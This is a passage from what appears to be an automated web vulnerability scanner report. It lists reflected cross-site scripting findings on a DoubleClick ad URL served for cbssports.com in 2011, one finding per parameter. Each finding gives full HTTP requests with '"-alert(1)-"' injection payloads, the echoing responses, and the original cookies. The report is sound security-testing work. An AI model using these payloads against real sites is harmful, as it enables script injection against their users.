GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59cb6a1"-alert(1)-"2fce02e725&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:02:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6950

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59cb6a1"-alert(1)-"2fce02e725&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tb
...[SNIP]...

3.54. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a85c1"-alert(1)-"a850f38534d was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=a85c1"-alert(1)-"a850f38534d&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:05:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=a85c1"-alert(1)-"a850f38534d&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&even
...[SNIP]...

3.55. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c402c"-alert(1)-"b9372fb4719 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c402c"-alert(1)-"b9372fb4719&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c402c"-alert(1)-"b9372fb4719&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...

3.56. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [cpnmodule parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4967e"-alert(1)-"61439fec9d1 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=4967e"-alert(1)-"61439fec9d1&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=4967e"-alert(1)-"61439fec9d1&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

3.57. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2b25"-alert(1)-"c1a8f9ea9c2 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=a2b25"-alert(1)-"c1a8f9ea9c2&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:06:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
97/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=a2b25"-alert(1)-"c1a8f9ea9c2&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http:
...[SNIP]...

3.58. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [epartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86d72"-alert(1)-"3044e5f3dbb was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=86d72"-alert(1)-"3044e5f3dbb&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=86d72"-alert(1)-"3044e5f3dbb&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
va
...[SNIP]...

3.59. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [event parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9555"-alert(1)-"c8daeff0702 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=c9555"-alert(1)-"c8daeff0702 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6942
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:11:12 GMT
Expires: Wed, 27 Apr 2011 22:11:12 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
p=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=c9555"-alert(1)-"c8daeff0702http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "
...[SNIP]...

3.60. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59da1"-alert(1)-"eaf124f5b59 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn59da1"-alert(1)-"eaf124f5b59&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:01:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn59da1"-alert(1)-"eaf124f5b59&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.
...[SNIP]...

3.61. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 775c5"-alert(1)-"994e6e2c419 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US775c5"-alert(1)-"994e6e2c419&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:03:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
6%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US775c5"-alert(1)-"994e6e2c419&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht
...[SNIP]...

3.62. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [nd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84197"-alert(1)-"7be177ce9c5 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240884197"-alert(1)-"7be177ce9c5&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:05:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
